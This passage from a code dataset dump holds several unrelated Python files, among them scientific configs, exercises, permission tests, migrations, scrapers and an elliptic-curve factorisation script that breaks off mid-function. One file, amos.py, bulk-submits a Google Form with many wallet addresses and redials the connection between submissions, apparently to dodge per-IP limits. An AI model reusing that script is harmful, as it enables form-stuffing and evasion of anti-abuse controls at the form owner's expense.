(\"Uniform\", [0.9, 1.5])\npriors[\"Z\"] = (\"Uniform\", [0.0023, 0.0175])\npriors[\"log_Z\"] = (\"Uniform\", [math.log10(0.0023), math.log10(0.0175)])\npriors[\"X\"] = (\"Uniform\", [0.68, 0.73])\n# priors[\"log_X\"] = (\"Uniform\", [math.log10(0.68), math.log10(0.73)])\npriors[\"Age\"] = (\"Uniform\", [0.0, 2e4])\npriors[\"numax\"] = (\"Uniform\", [0.0, 5.0e3])\npriors[\"A_surf\"] = (\"Uniform\", [-1.0, 1.0]) # this is too broad and will be sent by AIMS\npriors[\"A3_surf\"] = (\"Uniform\", [-1e-12, 1e-12]) # this too broad and should be set experimentally\npriors[\"Am1_surf\"] = (\"Uniform\", [-1e-6, 1e-6]) # this too broad and should be set experimentally\n######################### Interpolation ###############################\nscale_age = True # use a scaled age when interpolating\n######################### Interpolation tests #########################\ntest_interpolation = False # decide whether to test the interpolation.\n # If True, interpolation tests are carried\n # out for the above binary grid, and written\n # in binary format to a file which can\n # subsequently be analysed using plot_test.py.\ninterpolation_file = \"interp_RGB\" # Name of the file to which to\n # write the results from the interpolation\n # tests. This file can be analysed using\n # plot_test.py.\n######################### Output #######################################\n# choice of parameters: \"Mass\", \"Radius\", \"Luminosity\", \"Z\", \"X\", \"Fe_H\",\n# \"M_H\", \"Age\", \"Teff\", \"Dnu\", \"Rho\", \"g\"\n# possible prefixes: \"log_\", \"ln_\", \"exp_\"\n# example: \"log_g\" corresponds to log_{10}(g), where $g$ is the surface gravity\noutput_params = (\"Radius\",\"Mass\",\"log_g\",\"Rho\",\"Age\",\"Teff\",\"X\",\"numax\",\"Dnu\",\"Luminosity\",\"Fe_H\",\"M_H\")#,\"DNl1\")\noutput_dir = \"results\" # name of the root folder with the results\noutput_osm = \"osm\" # name of the root folder with the OSM files\nwith_osm = False # decide whether to write output files for\n # OSM (=Optimal Stellar Model by R. 
Samadi)\nwith_combinations = True  # decide whether to write file with model combinations\nwith_walkers = True       # decide whether to plot walkers\nwith_echelle = True       # decide whether to plot echelle diagrams\nwith_histograms = True    # decide whether to plot histograms\nwith_triangles = True     # decide whether to make triangle plots\nwith_rejected = True      # decide whether to make triangle plots with accepted/rejected models\nplot_extensions = ['png'] # extensions (and formats) for all simple plots\ntri_extensions = ['png']  # extensions (and formats) for triangle plots\n# supported formats: eps, jpeg, jpg, pdf, pgf, png, ps, raw, rgba, svg, svgz, tif, tiff\nbackend = 'agg'  # matplotlib backend with which to produce plots.\n                 # Options (may differ according to installation):\n                 # 'pdf', 'pgf', 'Qt4Agg', 'GTK', 'GTKAgg',\n                 # 'ps', 'agg', 'cairo', 'MacOSX', 'GTKCairo',\n                 # 'WXAgg', 'template', 'TkAgg', 'GTK3Cairo',\n                 # 'GTK3Agg', 'svg', 'WebAgg', 'CocoaAgg',\n                 # 'emf', 'gdk', 'WX'\n                 # None = use default backend\n                 # NOTE: some backends (such as 'TkAgg') do not\n                 #       work in batch mode.\n","sub_path":"AIMS-Py35/AIMS_configure.py","file_name":"AIMS_configure.py","file_ext":"py","file_size_in_byte":13156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"145399900","text":"\"\"\"\nProblem : D2 1948 Date Calculator\n\nWrite a program that reads two dates, each given as a month and a day, and prints on which day of the first date the second date falls (counting the first date as day 1).\n\nThe month is an integer from 1 to 12, and the last day of each month is as follows:\n1/31, 2/28, 3/31, 4/30, 5/31, 6/30, 7/31, 8/31, 9/30, 10/31, 11/30, 12/31\nThe second date is always given later than the first date.\n\nThe very first line contains the number of test cases T, and the test cases are given below it.\nThe first line of each test case contains four numbers.\nThe first number is the month and the second number is the day; the second date is then given in the same format.\n\nEach output line starts with '#t', followed by a single space and then the answer.\n(t is the test case number, starting from 1.)\n\"\"\"\n\ndef solution():\n    \"\"\"Read two dates given as a month and a day, compute on which day of the first date the second date falls, and print the result.\n\n    Variables:\n        T : number of test cases\n        test_case : list of test cases\n        month : list of the number of days in each month\n        result : on which day the second date falls, counted from the first date\n        pre_month : month of the first date\n        pre_day : day of the first date\n        next_month : month of the second date\n        next_day : day of the second date\n\n    Example:\n        >>> 1 : input T\n        >>> 7 17 12 24 : input test case\n        >>> #1 161 : output\n    \"\"\"\n    T = int(input())\n    test_case = [list(map(int, input().split())) for t in range(T)]\n    month = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n    for t in range(1, T+1):\n        result = 0\n        pre_month, pre_day, next_month, next_day = test_case[t-1][0], test_case[t-1][1], test_case[t-1][2], test_case[t-1][3]\n\n        if next_month - pre_month > 0:\n            for m in range(pre_month+1, next_month):\n                result += month[m]\n            result += month[pre_month] - pre_day + next_day + 1\n        else:\n            result = next_day - pre_day + 1\n        \n        print(f'#{t} {result}')\n\nsolution()","sub_path":"D2_1948_DateCalculator.py","file_name":"D2_1948_DateCalculator.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"255135518","text":"import unittest\nfrom tests.ggrc import TestCase\nfrom ggrc.models import get_model\nfrom ggrc.models import all_models\nfrom tests.ggrc.api_helper import Api\nfrom tests.ggrc.generator import Generator\nfrom tests.ggrc.generator import GgrcGenerator\n\n\nclass TestCreator(TestCase):\n  def setUp(self):\n    TestCase.setUp(self)\n\n    self.generator = Generator()\n    self.api = Api()\n    self.ggrc_generator = GgrcGenerator()\n    self.maxDiff = None\n    self._generate_users()\n\n  def _generate_users(self):\n    users = 
[('creator', 'Creator'), ('admin', 'gGRC Admin')]\n for (name, role) in users:\n _, user = self.ggrc_generator.generate_person(\n data={\"name\": name}, user_role=role)\n setattr(self, name, user)\n\n def test_creator_can_crud_basic_models(self):\n self.api.set_user(self.creator)\n all_errors = []\n base_models = set([\n 'Control', 'ControlAssessment', 'DataAsset', 'Contract',\n 'Policy', 'Regulation', 'Standard', 'Document', 'Facility',\n 'Market', 'Objective', 'OrgGroup', 'Vendor', 'Product',\n 'Clause', 'System', 'Process', 'Issue', 'Project'\n ])\n for model_singular in base_models:\n try:\n model = get_model(model_singular)\n table_singular = model._inflector.table_singular\n table_plural = model._inflector.table_plural\n # Test POST creation\n response = self.api.post(model, {\n table_singular: {\n \"title\": model_singular,\n \"context\": None,\n \"reference_url\": \"ref\",\n \"contact\": {\n \"type\": \"Person\",\n \"id\": self.creator.id,\n },\n },\n })\n if response.status_code != 201:\n all_errors.append(\"{} post creation failed {} {}\".format(\n model_singular, response.status, response.data))\n continue\n\n # Test GET when not owner\n obj_id = response.json.get(table_singular).get('id')\n response = self.api.get(model, obj_id)\n if response.status_code != 403: # we are not onwers yet\n all_errors.append(\n \"{} can retrieve object if not owner\".format(model_singular))\n continue\n response = self.api.get_collection(model, obj_id)\n collection = response.json.get(\n \"{}_collection\".format(table_plural)).get(table_plural)\n if len(collection) != 0:\n all_errors.append(\n \"{} can retrieve object if not owner (collection)\".format(model_singular))\n continue\n # Become an owner\n response = self.api.post(all_models.ObjectOwner, {\"object_owner\": {\n \"person\": {\n \"id\": self.creator.id,\n \"type\": \"Person\",\n }, \"ownable\": {\n \"type\": model_singular,\n \"id\": obj_id\n }, \"context\": None},\n })\n if response.status_code != 201:\n all_errors.append(\"{} can't create owner {}.\".format(\n model_singular, response.status))\n continue\n\n # Test GET when owner\n response = self.api.get(model, obj_id)\n if response.status_code != 200:\n all_errors.append(\"{} can't GET object {}\".format(\n model_singular, response.status))\n continue\n\n # Test GET collection when owner\n response = self.api.get_collection(model, obj_id)\n collection = response.json.get(\n \"{}_collection\".format(table_plural)).get(table_plural)\n if len(collection) == 0:\n all_errors.append(\n \"{} cannot retrieve object even if owner (collection)\".format(model_singular))\n continue\n except:\n all_errors.append(\"{} exception thrown\".format(model_singular))\n raise\n self.assertEquals(all_errors, [])\n\n def test_creator_search(self):\n self.api.set_user(self.admin)\n self.api.post(all_models.Regulation, {\n \"regulation\": {\"title\": \"Admin regulation\", \"context\": None},\n })\n self.api.set_user(self.creator)\n response = self.api.post(all_models.Policy, {\n \"policy\": {\"title\": \"Creator Policy\", \"context\": None},\n })\n obj_id = response.json.get('policy').get('id')\n self.api.post(all_models.ObjectOwner, {\"object_owner\": {\n \"person\": {\n \"id\": self.creator.id,\n \"type\": \"Person\",\n }, \"ownable\": {\n \"type\": \"Policy\",\n \"id\": obj_id,\n }, \"context\": None},\n })\n response, _ = self.api.search('Regulation,Policy')\n entries = response.json['results']['entries']\n self.assertEquals(len(entries), 1)\n self.assertEquals(entries[0]['type'], \"Policy\")\n response, _ 
= self.api.search('Regulation,Policy', counts=True)\n self.assertEquals(response.json['results']['counts']['Policy'], 1)\n self.assertEquals(\n response.json['results']['counts'].get('Regulation'), None)\n\n def _get_count(self, obj):\n response, _ = self.api.search(obj, counts=True)\n return response.json['results']['counts'].get(obj)\n\n def test_creator_should_see_all_users(self):\n self.api.set_user(self.admin)\n admin_count = self._get_count('Person')\n self.api.set_user(self.creator)\n creator_count = self._get_count('Person')\n self.assertEquals(admin_count, creator_count)\n\n def test_creator_cannot_become_owner(self):\n self.api.set_user(self.admin)\n _, obj = self.generator.generate(all_models.Regulation, \"regulation\", {\n \"regulation\": {\"title\": \"Test regulation\", \"context\": None},\n })\n self.api.set_user(self.creator)\n response = self.api.post(all_models.ObjectOwner, {\"object_owner\": {\n \"person\": {\n \"id\": self.creator.id,\n \"type\": \"Person\",\n }, \"ownable\": {\n \"type\": \"Regulation\",\n \"id\": obj.id,\n }, \"context\": None},\n })\n self.assertEquals(response.status_code, 403)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/tests/ggrc_basic_permissions/test_creator.py","file_name":"test_creator.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"429995588","text":"import pandas as pd\n\nnato_data = pd.read_csv(\"nato_phonetic_alphabet.csv\")\n# Create a dictionary from this data\nnato_dict = {row.letter: row.code for (index, row) in nato_data.iterrows()}\n\nuser_input = input(\"Enter a word: \")\nnato_words = [nato_dict[letter.upper()] for letter in user_input]\n\nprint(nato_words)\n","sub_path":"26/challenge/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"430269438","text":"\"\"\"migration v0.1\n\nRevision ID: 1cf17229dc4\nRevises: 51f5ccfba190\nCreate Date: 2017-05-14 16:25:30.902016\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1cf17229dc4'\ndown_revision = '51f5ccfba190'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('dbinfos',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.Text(), nullable=True),\n sa.Column('ip', sa.Integer(), nullable=True),\n sa.Column('port', sa.Integer(), nullable=True),\n sa.Column('dbname', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('monilogs',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('monitor_log', sa.Text(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('db_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['db_id'], ['dbinfos.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_monilogs_timestamp', 'monilogs', ['timestamp'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
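The Alembic migration in this record shows the usual symmetry: downgrade() undoes upgrade() in reverse order, dropping the index before the table that carries it, and the dependent table before its parent. A minimal sketch of the same pattern follows; the table and column names here are hypothetical, not the tables of this migration.

from alembic import op
import sqlalchemy as sa

def upgrade():
    op.create_table('parents',
        sa.Column('id', sa.Integer(), primary_key=True))
    op.create_table('children',
        sa.Column('id', sa.Integer(), primary_key=True),
        sa.Column('parent_id', sa.Integer(), sa.ForeignKey('parents.id')))
    op.create_index('ix_children_parent_id', 'children', ['parent_id'])

def downgrade():
    # Strict reverse of upgrade(): index, dependent table, then parent table.
    op.drop_index('ix_children_parent_id', 'children')
    op.drop_table('children')
    op.drop_table('parents')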
###\n op.drop_index('ix_monilogs_timestamp', 'monilogs')\n op.drop_table('monilogs')\n op.drop_table('dbinfos')\n ### end Alembic commands ###\n","sub_path":"migrations_bak/versions/1cf17229dc4_migration_v0_1.py","file_name":"1cf17229dc4_migration_v0_1.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155410339","text":"from datetime import datetime\n\nimport pytest\nfrom city_scrapers_core.constants import COMMISSION, PASSED, TENTATIVE\nfrom freezegun import freeze_time\nfrom tests.utils import file_response\n\nfrom city_scrapers.spiders.chi_ssa_25 import ChiSsa25Spider\n\ntest_response = file_response(\n 'files/chi_ssa_25.html', 'http://littlevillagechamber.org/2019-meetings-minutes/'\n)\nspider = ChiSsa25Spider()\n\nfreezer = freeze_time('2019-03-17')\nfreezer.start()\n\nparsed_items = [item for item in spider.parse(test_response)]\n\nfreezer.stop()\n\n\ndef test_title():\n assert parsed_items[0]['title'] == 'Commission: Monthly'\n\n\ndef test_start():\n assert parsed_items[0]['start'] == datetime(2019, 1, 15, 9)\n assert parsed_items[-1]['start'] == datetime(2019, 12, 17, 9)\n\n\ndef test_end():\n assert parsed_items[0]['end'] == datetime(2019, 1, 15, 10)\n assert parsed_items[-1]['end'] == datetime(2019, 12, 17, 10)\n\n\ndef test_id():\n assert parsed_items[0]['id'] == 'chi_ssa_25/201901150900/x/commission_monthly'\n\n\ndef test_status():\n assert parsed_items[0]['status'] == PASSED\n assert parsed_items[-1]['status'] == TENTATIVE\n\n\ndef test_location():\n assert parsed_items[0]['location'] == {\n 'name': 'LV Chamber',\n 'address': '3610 W. 26th St. 2nd Floor Chicago, IL',\n }\n assert parsed_items[-1]['location'] == {\n 'name': 'Nuevo Leo Restaurant',\n 'address': '3657 W 26th St. 
2nd Floor Chicago, IL',\n }\n\n\ndef test_source():\n assert parsed_items[0]['source'] == 'http://littlevillagechamber.org/2019-meetings-minutes/'\n\n\ndef test_links():\n assert parsed_items[0]['links'] == [{\n 'href':\n 'http://littlevillagechamber.org/wp-content/uploads/2019/03/SSA-Jan.-15.-2019-Meeting-Minutes.pdf', # noqa\n 'title': 'Minutes'\n }]\n assert parsed_items[-1]['links'] == []\n\n\n@pytest.mark.parametrize('item', parsed_items)\ndef test_classification(item):\n assert item['classification'] == COMMISSION\n","sub_path":"tests/test_chi_ssa_25.py","file_name":"test_chi_ssa_25.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"305340258","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\nclass Amos:\n def __init__(self, drvier, input_dict):\n self.driver = drvier\n self.input_dict = input_dict\n\n\n def auto_process(self):\n self.driver.get('https://docs.google.com/forms/d/e/1FAIpQLScyC2izxDvE9WSSdY8eLFIus-kedcdQrdW9UB4LCL0ku6JmjQ/viewform')\n element = WebDriverWait(self.driver, 30, 0.5).until(\n EC.presence_of_element_located((By.ID, \"mG61Hd\")))\n\n #1.input every para\n inputs = self.driver.find_elements_by_tag_name('input')\n for input in inputs:\n if input is not None:\n label_name = input.get_attribute('aria-label')\n if label_name is None:\n continue\n time.sleep(1)\n try:\n input.send_keys(self.input_dict[label_name])\n except:\n print('Input fail : ', label_name)\n\n # labels = self.driver.find_elements_by_tag_name('label')\n # for label in labels:\n # if label is not None:\n # time.sleep(1)\n # checkbox = label.find_element_by_tag_name('span')\n # ActionChains(self.driver).move_to_element(checkbox).click(checkbox).perform()\n\n\n button = self.driver.find_element_by_xpath(\"//div[@role='button']\").find_element_by_tag_name('span')\n button.click()\n\n\n\nif __name__ == \"__main__\":\n import xlrd\n import configparser\n from dial_adsl import Adsl\n\n cf = configparser.ConfigParser()\n cf.read('config.ini')\n\n username = cf.get('adsl', 'username')\n password = cf.get('adsl', 'password')\n print(username, password)\n adsl = Adsl(username, password)\n\n input_file = cf.get('input', 'file')\n book = xlrd.open_workbook(input_file)\n sheet = book.sheet_by_index(0)\n print(sheet.name)\n\n for row_index in range(1, sheet.nrows):\n driver = webdriver.Chrome()\n\n wallet = sheet.cell(row_index, 0).value\n email = sheet.cell(row_index, 1).value\n input_para = {}\n input_para['Eth Wallet address 錢包地址 '] = wallet\n input_para['Email'] = email\n\n with open('result.txt', 'a') as fw:\n try:\n shop = Amos(driver, input_para)\n shop.auto_process()\n except:\n fw.write(\"ERROR: \" + wallet + ', ' + email+'\\n')\n print(\"ERROR: \" + wallet + ', ' + email+'\\n')\n else:\n fw.write(\"SUCCE: \" + wallet + ', ' + email+'\\n')\n print(\"SUCCE: \" + wallet + ', ' + email+'\\n')\n finally:\n driver.quit()\n\n adsl.dial()\n\n\n","sub_path":"amos.py","file_name":"amos.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"557432816","text":"from __future__ import division\nfrom numpy import *\nfrom scipy import *\nfrom matplotlib.pyplot import 
*\nfrom math import *\nfrom pylab import *\n\nn = 100 # number of points\ndx = 0.1 # change in x\nw = 0.4 # weight per unit length\n\n\n# First Derivative Function\ndef diff(a):\n # D1: creating a nxn matrix to calculate 1st derivative of y\n d1 = [[0 for i in range(n)] for j in range(n)]\n # first row is different\n d1[0][0] = -3\n d1[0][1] = 4\n d1[0][2] = -1\n # last row is different\n d1[n - 1][n - 3] = 1\n d1[n - 1][n - 2] = -4\n d1[n - 1][n - 1] = 3\n # creating the rows in between 1st row and last row\n for i in range(n - 2):\n d1[i + 1][i] = -1\n d1[i + 1][i + 2] = 1\n return 1 / (2 * dx) * matmul(d1, a) # matmul=matrix multiplication\n\n\n# Second Derivative Function\ndef d_diff(a):\n # D2: creating a nxn matrix to calculate second derivative of y\n d2 = [[0 for i in range(n)] for j in range(n)]\n # first row is different\n d2[0][0] = 1\n d2[0][1] = -2\n d2[0][2] = 1\n # last row is different\n d2[n - 1][n - 3] = 1\n d2[n - 1][n - 2] = -2\n d2[n - 1][n - 1] = 1\n # creating the rows in between 1st row and last row\n for i in range(n - 2):\n d2[i + 1][i] = 1\n d2[i + 1][i + 1] = -2\n d2[i + 1][i + 2] = 1\n return 1 / (dx ** 2) * matmul(d2, a) # matmul=matrix multiplication","sub_path":"Derivatives.py","file_name":"Derivatives.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"342867510","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('visit', '0076_staff_secondary_schools'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='staff',\n name='secondary_schools',\n field=models.ManyToManyField(related_name='secondary_staff', to='visit.School'),\n ),\n ]\n","sub_path":"visit/migrations/0077_auto_20150828_2100.py","file_name":"0077_auto_20150828_2100.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"510585842","text":"import pygame\nimport pickle\nfrom pygame.locals import *\n\n# SETUP *****************************************\n\npygame.init()\nSCREEN = WIDTH, HEIGHT = 288, 512\nwin = pygame.display.set_mode(SCREEN, pygame.SCALED | pygame.FULLSCREEN)\nclock = pygame.time.Clock()\nFPS = 45\n\nt = 16\nROWS, COLS = HEIGHT // 16, WIDTH // 16\n\nt_list = []\nfor i in (7,8,24,15,16):\n\ttile = pygame.image.load(f\"tiles/{i}.png\")\n\ttile = pygame.transform.rotate(tile, -90)\n\tt_list.append(tile)\n\n\nrunning = True\nwhile running:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trunning = False\n\t\t\t\n\tfor c in range(COLS):\n\t\tfor r in range(ROWS):\n\t\t\tif c in (0,1,2,3,4,5):\n\t\t\t\twin.blit(t_list[2], (c*t, r * t))\n\t\t\tif c == 6:\n\t\t\t\twin.blit(t_list[4], (c*t, r*t))\n\t\t\tif c in (7,8,9,10):\n\t\t\t\twin.blit(t_list[1], (c*t, r*t))\n\t\t\tif c == 11:\n\t\t\t\twin.blit(t_list[3], (c*t, r*t))\n\t\t\tif c in (12,13,14,15,16,17):\n\t\t\t\twin.blit(t_list[0], (c*t, r*t))\n\t\t\t\t\n\tpygame.image.save(win, \"bg.png\")\n\t\t\t\t\n\tclock.tick(FPS)\n\tpygame.display.update()\n\t\t\t\npygame.quit()","sub_path":"Level Designer/Level Editor for pydroid3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"328598773","text":"# Load libraries\nfrom sklearn.datasets import load_boston\nfrom 
sklearn.cross_validation import train_test_split\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import roc_auc_score, accuracy_score, f1_score, roc_curve, auc\nfrom sklearn.preprocessing import PolynomialFeatures\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef build_model(X,y,n_estimators=500):\n \"\"\"\n Build a Gradient Boost regression model\n \"\"\"\n model = GradientBoostingClassifier(n_estimators=n_estimators,verbose=10,\\\n subsample=0.7, learning_rate= 0.15,max_depth=3,random_state=77)\n model.fit(X,y)\n return model \n\ndef view_model(model):\n \"\"\"\n \"\"\"\n print(\"\\n Training scores\")\n print(\"======================\\n\")\n for i,score in enumerate(model.train_score_):\n print(\"\\tEstimator %d score %0.3f\"%(i+1,score))\n\n plt.cla()\n plt.figure(1)\n plt.plot(range(1,model.estimators_.shape[0]+1),model.train_score_)\n plt.xlabel(\"Model Sequence\")\n plt.ylabel(\"Model Score\")\n plt.show()\n\n print(\"\\n Feature Importance\")\n print(\"======================\\n\")\n for i,score in enumerate(model.feature_importances_):\n print(\"\\tFeature %d Importance %0.3f\"%(i+1,score))\n \n \n\ndef model_worth(y_test,predicted_y, n_classes=2):\n \"\"\"\n Evaluate the model\n \"\"\"\n print(\"\\tAccuracy score = %0.2f\"%(accuracy_score(y_test,predicted_y)))\n print(\"\\tROC AUC = %0.2f\"%(roc_auc_score(y_test, predicted_y)))\n print(\"\\tF1 score = %0.2f\"%(f1_score(y_test, predicted_y)))\n\n\ndef make_roc(name, clf, y_test, X_test, ax=None, labe=5, proba=True, skip=0):\n initial = False\n if not ax:\n ax = plt.gca()\n initial = True\n if proba:\n fpr, tpr, thresholds = roc_curve(y_test, clf.predict_proba(X_test)[:, 1])\n else:\n fpr, tpr, thresholds = roc_curve(y_test, clf.decision_function(X_test))\n roc_auc = auc(fpr, tpr)\n if skip:\n l = fpr.shape[0]\n ax.plot(fpr[0:l:skip], tpr[0:l:skip], '.-', alpha=0.3,\n label='ROC curve for %s (area = %0.2f)' % (name, roc_auc))\n else:\n ax.plot(fpr, tpr, '.-', alpha=0.3, label='ROC curve for %s (area = %0.2f)' % (name, roc_auc))\n label_kwargs = {}\n label_kwargs['bbox'] = dict(\n boxstyle='round,pad=0.3', alpha=0.2,\n )\n for k in list(range(0, fpr.shape[0], labe)):\n # from https://gist.github.com/podshumok/c1d1c9394335d86255b8\n threshold = str(np.round(thresholds[k], 2))\n ax.annotate(threshold, (fpr[k], tpr[k]), **label_kwargs)\n if initial:\n ax.plot([0, 1], [0, 1], 'k--')\n ax.set_xlim([0.0, 1.0])\n ax.set_ylim([0.0, 1.05])\n ax.set_xlabel('False Positive Rate')\n ax.set_ylabel('True Positive Rate')\n ax.set_title('ROC')\n ax.legend(loc=\"lower right\")\n return ax\n\nif __name__ == \"__main__\":\n pass","sub_path":"analysis/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"637870055","text":"# This implementation of breath first search is build for a adjancency list graph structure,\n# where you have an array and each index of the array is a node in the graph,\n# each graph[index] has another list that represent the node that can be reached from the node \"index\"\nfrom collections import deque\ndef bfs(graph,node):\n visited = set([node])\n queue = deque()\n queue.append(node)\n\n # this variable path is not necesary but we used just to return the path of node that\n # our algorithm has visited at any iteration\n path = [node]\n\n while queue:\n current_node = queue.popleft()\n for n in range(len(graph[current_node])):\n if graph[current_node][n] not in 
visited:\n visited.add(graph[current_node][n])\n queue.append(graph[current_node][n])\n path.append(graph[current_node][n])\n\n return path\n\n# Testing the algorithm\ngraph = [[1,2],[4,5],[3],[],[],[6,7],[],[]]\n\"\"\"\n 0\n | |\n 1 2 \n | | | \n 4 5 3\n | |\n 6 7\n \n\"\"\"\npth = bfs(graph,0)\nprint(pth)","sub_path":"venv/Graphs/Traversal/breath_first_search.py","file_name":"breath_first_search.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220569282","text":"import numpy as np\r\nfrom random import randint\r\nimport time \r\n\r\n#%%\r\n# Test pour savoir si le nombre premier ou non \r\ndef NombrePremier(p):\r\n if(p == 2):\r\n return True,1\r\n\r\n if(p == 1 or p%2==0):\r\n return False,2\r\n\r\n return Rabin_Miller(p, 50,2)\r\n\r\n# Rabin Millier Test Nombre Premier\r\ndef Rabin_Miller(p, iterations,count):\r\n r=0\r\n s=p-1\r\n p=int(p)\r\n \r\n Premier=True\r\n count+=1\r\n while(s%2==0):\r\n count+=1 \r\n r+= 1\r\n s=int(s// 2)\r\n\r\n for i in range(0,iterations):\r\n a = randint(2,p-1)\r\n x = pow(a, s, p)\r\n \r\n count+=3\r\n if(x==1 or x==(p-1)):\r\n continue\r\n \r\n for j in range(r-1):\r\n x = pow(x,2,p)\r\n count+=1\r\n if(x==p-1):\r\n break\r\n else:\r\n Premier=False\r\n \r\n return Premier,count\r\n#%%\r\n\"\"\"\r\n Factorisation de Lenstra par les courbes elliptiques\r\n \r\n Algo Probabiliste rapide pour la décomposition en produit de facteurs premiers\r\n qui emploie les courbes elliptiques\r\n \r\n Amélioration de l'algo p-1 Pollard\r\n \r\n \r\n Etapes de L'Algorithme\r\n \r\n 1)\r\n Prendre une courbe elliptique aléatoire sur Z avec un point A sur elle. \r\n Alors, nous considérons la loi de groupe sur cette courbe modulo n - ceci est possible \r\n car la plupart des résidus modulo n ont des inverses, \r\n qui peuvent être trouvés en utilisant l'algorithme d'Euclide \r\n et en trouvant un résidu non-inversible équivalent à la factorisation de n\r\n \r\n 2) \r\n Calculer eA dans ce groupe, où e est le produit de petits nombres premiers \r\n élevés aux petites puissances, comme dans la méthode p−1 de Pollard. \r\n Il peut donner un nombre premier en une fois, et est ainsi efficace.\r\n \r\n 3)\r\n Avec un peu de chance, eA est l'élément nul du groupe de la courbe elliptique dans Fp, \r\n mais pas dans Fq pour un autre diviseur premier q de n \r\n (comme dans la méthode p−1 de Pollard, il est très improbable que les deux groupes \r\n aient un ordre qui soit un diviseur de e). 
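The record above pairs a breadth-first search with the start of a Lenstra elliptic-curve factorisation script whose comments and docstring are in French; its NombrePremier/Rabin_Miller pair implements a Miller-Rabin primality test with 50 random witnesses while threading an operation counter through every call. For sanity-checking that part, a compact standalone Miller-Rabin can be useful. This is an independent reimplementation without the counter, not the record's code.

import random

def miller_rabin(n, rounds=50):
    # Probabilistic primality test: False means composite, True means probably prime.
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0:
        return False
    # Write n - 1 as 2^r * s with s odd.
    r, s = 0, n - 1
    while s % 2 == 0:
        r += 1
        s //= 2
    for _ in range(rounds):
        a = random.randint(2, n - 2)
        x = pow(a, s, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a witnesses that n is composite
    return True

print(miller_rabin(97), miller_rabin(91))  # True, False (91 = 7 * 13)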
\r\n Alors nous pouvons trouver un facteur de n \r\n en calculant le PGCD de la première coordonnée de A et n, \r\n car cette coordonnée sera nulle dans Fp\r\n \r\n 4)\r\n Si cela ne marche pas, \r\n il suffit de recommencer avec une autre courbe ou un autre point de départ.\r\n\r\n\r\n Complexité\r\n \r\n Dépend de la taille du facteur.\r\n Elle peut être exprimée par O(e(√2 + o(1)) √ln p ln ln p)\r\n où p est le plus petit facteur de n.\r\n\r\n\"\"\"\r\n#%%\r\n\r\n# Determine l'inverse d'un nombre dans Z/nZ / Algo + optimisé\r\n# Algorithme Euclide Etendu \r\ndef extended_gcd(a, b):\r\n count=0\r\n r, reste = abs(a), abs(b)\r\n x, u, y, v = 0, 1, 1, 0\r\n while reste:\r\n count+=1 # while reste:\r\n r, (quotient, reste) = reste, divmod(r, reste)\r\n x, u = u - quotient*x, x\r\n y, v = v - quotient*y, y\r\n return r, u * (-1 if a < 0 else 1), v * (-1 if b < 0 else 1),count\r\n\r\n\r\n# P=(x1,y1)\r\n# Q=(x2,y2)\r\n\r\n# Addition de points d'une courbe elliptique dans Z/nZ\r\ndef Addition_Point(P,Q,Fp):\r\n count=0\r\n count+=1 # if(P =='O'): \r\n if(P =='O'): \r\n return Q,count\r\n count+=1 # if(Q =='O'):\r\n if(Q =='O'): \r\n return P,count\r\n \r\n # x1 = x2 && y1 = -y2 => P = -Q\r\n 